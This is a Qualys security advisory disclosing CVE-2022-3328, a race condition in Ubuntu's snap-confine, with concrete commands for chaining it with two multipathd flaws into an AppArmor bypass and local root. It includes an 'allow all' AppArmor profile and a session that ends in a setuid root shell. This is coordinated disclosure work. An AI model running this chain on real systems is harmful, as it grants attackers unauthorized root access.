Qualys Security Advisory
Race condition in snap-confine's must_mkdir_and_open_with_perms()
(CVE-2022-3328)
========================================================================
Contents
========================================================================
Summary
Background
Exploitation
Acknowledgments
Timeline
I can't help but feel a missed opportunity to integrate lyrics from
one of the best songs ever: [SNAP! - The Power (Official Video)]
-- https://twitter.com/spendergrsec/status/1494420041076461570
========================================================================
Summary
========================================================================
We discovered a race condition (CVE-2022-3328) in snap-confine, a
SUID-root program installed by default on Ubuntu. In this advisory, we
tell the story of this vulnerability (which was introduced in February
2022 by the patch for CVE-2021-44731) and detail how we exploited it in
Ubuntu Server (a local privilege escalation, from any user to root) by
combining it with two vulnerabilities in multipathd (an authorization
bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):
https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt
========================================================================
Background
========================================================================
Like the crack of the whip, I Snap! attack
Radical mind, day and night all the time
-- SNAP! - The Power
In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory
(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):
to set up a snap's sandbox, snap-confine created the temporary directory
/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did
not belong to root; a local attacker could race against snap-confine,
retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full
root privileges.
This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:
Prevent user-controlled race in setup_private_mount"), which introduced
a new helper function, must_mkdir_and_open_with_perms():
------------------------------------------------------------------------
142 static void setup_private_mount(const char *snap_name)
...
169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
...
176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);
------------------------------------------------------------------------
55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,
56 mode_t mode)
...
61 mkdir:
...
67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
...
70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
...
81 if (fstat(fd, &st) < 0) {
...
84 if (st.st_uid != uid || st.st_gid != gid
85 || st.st_mode != (S_IFDIR | mode)) {
...
130 if (rename(dir, random_dir) < 0) {
...
135 goto mkdir;
------------------------------------------------------------------------
- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if
it does not exist already;
- if it already exists, and if it does not belong to root (at line 84),
then it is moved out of the way (at line 130) by rename()ing it to a
random directory in /tmp, and its creation is retried (at line 135).
When we reviewed this patch back in December 2021, we felt very nervous
about this rename() call (because it allows a local attacker to rename()
a directory they do not own), and we advised the Ubuntu Security Team to
either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create
it in a non-world-writable directory instead of /tmp, or at least to use
renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of
these ideas were deemed impractical (for example, renameat2() is not
supported by older kernel and glibc versions); moreover, we (Qualys)
failed to come up with a feasible attack plan against this rename()
call, so the patch was kept in its current form.
After the release of Ubuntu 22.04 in April 2022, we decided to revisit
snap-confine and its recent hardening changes, and we finally found a
way to exploit the rename() call in must_mkdir_and_open_with_perms().
========================================================================
Exploitation
========================================================================
It's getting, it's getting, it's getting kinda heavy
It's getting, it's getting, it's getting kinda hectic
-- SNAP! - The Power
The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:
1/ snap-confine operates in /tmp to create a snap's temporary directory
(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in
/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in
sc_bootstrap_mount_namespace(), where all of the Xs are randomized by
mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap
instance name by sc_instance_name_validate() (when all of the Xs are
lowercase alphanumeric):
------------------------------------------------------------------------
286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)
...
288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
...
291 if (mkdtemp(scratch_dir) == NULL) {
...
303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
...
319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
...
331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;
...
342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,
343 mnt->path);
...
352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,
------------------------------------------------------------------------
2/ We therefore execute two instances of snap-confine in parallel:
- we block the first snap-confine immediately after it creates its root
directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this
race condition by "single-stepping" snap-confine, as explained in our
"Lemmings" advisory);
- we execute the second snap-confine with a snap instance name of
rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of
this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX
of the first snap-confine;
- we kill this second snap-confine immediately after it rename()s its
temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory
/tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we
reliably win this race condition with inotify, as explained in our
"Lemmings" advisory);
- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and
resume the execution of the first snap-confine, whose root directory
now belongs to us.
3/ We can therefore create an arbitrary symlink
/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will
bind-mount the real /tmp directory (which is world-writable) onto any
directory in the filesystem (because mount() will follow our arbitrary
symlink at line 352).
This ability will eventually allow us to obtain full root privileges,
but we must first solve three problems:
------------------------------------------------------------------------
Problem a/ We cannot trick snap-confine into rename()ing
/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and
must_mkdir_and_open_with_perms() rename()s it only if it does not belong
to root!
This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX
belongs to the user root, but it belongs to the group of our own user,
so must_mkdir_and_open_with_perms() rename()s it because it does not
belong to the group root (at line 84).
------------------------------------------------------------------------
Problem b/ We cannot trick snap-confine into following our symlink
/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()
bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line
319): if we create our symlink before this bind-mount, then it becomes
covered by the squashfs; and we cannot create our symlink after this
bind-mount, because the squashfs is read-only and belongs to root!
The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"
of our "Lemmings" advisory suggests a solution to this problem: we must
unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()
bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used
in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,
but we found a surprisingly simple workaround:
we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately
after we re-create this directory ourselves; this allows us to unmount
(with fusermount -u -z) any subsequent bind-mounts (even if they belong
to root), because fusermount does not check that our FUSE filesystem is
indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.
------------------------------------------------------------------------
Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp
onto an arbitrary directory in the filesystem (at line 352), because
such a bind-mount is forbidden by snap-confine's AppArmor profile!
To solve this problem, we must bypass AppArmor completely, but the
technique we used in our "Lemmings" advisory (we wrapped snap-confine's
execution in an AppArmor profile that was in "complain" mode, not in
"enforce" mode) was patched in February 2022 (by commits 26eed65 and
4a2eb78, "ensure that snap-confine is in strict confinement" and
"Tighten AppArmor label check"):
now, snap-confine's execution must be wrapped in an AppArmor profile
that is in "enforce" mode and whose label matches the regular expression
"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".
We were about to give up on trying to exploit snap-confine, when we
discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is
installed by default on Ubuntu Server): these two vulnerabilities allow
us to create a directory named "failed_wwids" (user root, group root,
mode 0700) anywhere in the filesystem, and we were able to transform
this very limited directory creation into a complete AppArmor bypass.
AppArmor supports policy namespaces that are loosely related to kernel
user namespaces; by default, no AppArmor namespaces exist:
------------------------------------------------------------------------
$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 2 root root 0 Aug 6 12:42 .
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..
------------------------------------------------------------------------
However, we (attackers) can create an AppArmor namespace "failed_wwids"
by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:
------------------------------------------------------------------------
$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath
$ multipathd list devices | grep 'whitelisted, unmonitored'
sda1 devnode whitelisted, unmonitored
...
$ multipathd list list path sda1
fail
$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 3 root root 0 Aug 6 12:42 .
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..
drwx------ 5 root root 0 Aug 6 13:38 failed_wwids
------------------------------------------------------------------------
Then, we can enter this AppArmor namespace by creating and entering an
unprivileged user namespace:
------------------------------------------------------------------------
$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh
------------------------------------------------------------------------
Inside this namespace, we can create an AppArmor profile labeled
"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all
possible operations:
------------------------------------------------------------------------
# apparmor_parser -K -a << "EOF"
/usr/lib/snapd/snap-confine (enforce) {
capability,
network,
mount,
remount,
umount,
pivot_root,
ptrace,
signal,
dbus,
unix,
file,
change_profile,
}
EOF
------------------------------------------------------------------------
Back in the initial namespace, we check that our "allow all" AppArmor
profile still exists:
------------------------------------------------------------------------
# aa-status
apparmor module is loaded.
32 profiles are loaded.
32 profiles are in enforce mode.
...
:failed_wwids:/usr/lib/snapd/snap-confine
------------------------------------------------------------------------
Last, we make sure that snap-confine accepts our "allow all" AppArmor
profile (i.e., AppArmor is bypassed, and snap-confine is effectively
unconfined):
------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent
...
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
DEBUG: apparmor mode is: enforce
------------------------------------------------------------------------
We can therefore bind-mount /tmp onto an arbitrary directory in the
filesystem (by exploiting CVE-2022-3328); since we already depend on
multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,
create our own shared library /lib/multipath/libchecktur.so, shut down
multipathd (by exploiting CVE-2022-41974), restart multipathd (through
its Unix socket), and finally obtain full root privileges (because
multipathd executes our shared library as root when it restarts):
------------------------------------------------------------------------
$ grep multipath /proc/self/mountinfo | wc
0 0 0
$ gcc -o CVE-2022-3328 CVE-2022-3328.c
$ ./CVE-2022-3328
scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c
$ grep multipath /proc/self/mountinfo
1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
...
$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c
$ ps -ef | grep 'multipath[d]'
root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s
$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit
ok
$ ps -ef | grep 'multipath[d]' | wc
0 0 0
$ ls -l /tmp/sh
ls: cannot access '/tmp/sh': No such file or directory
$ multipathd list daemon
error -104 receiving packet
$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh
$ /tmp/sh -p
# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
                                     ^^^^^^^^^^^^
------------------------------------------------------------------------
========================================================================
Acknowledgments
========================================================================
We thank the Ubuntu Security Team (Alex Murray and Seth Arnold in
particular) and the snapd team for their hard work on this snap-confine
vulnerability. We also thank the members of linux-distros@openwall.
========================================================================
Timeline
========================================================================
2022-08-23: Contacted security@ubuntu.
2022-11-28: Contacted linux-distros@openwall.
2022-11-30: Coordinated Release Date (17:00 UTC).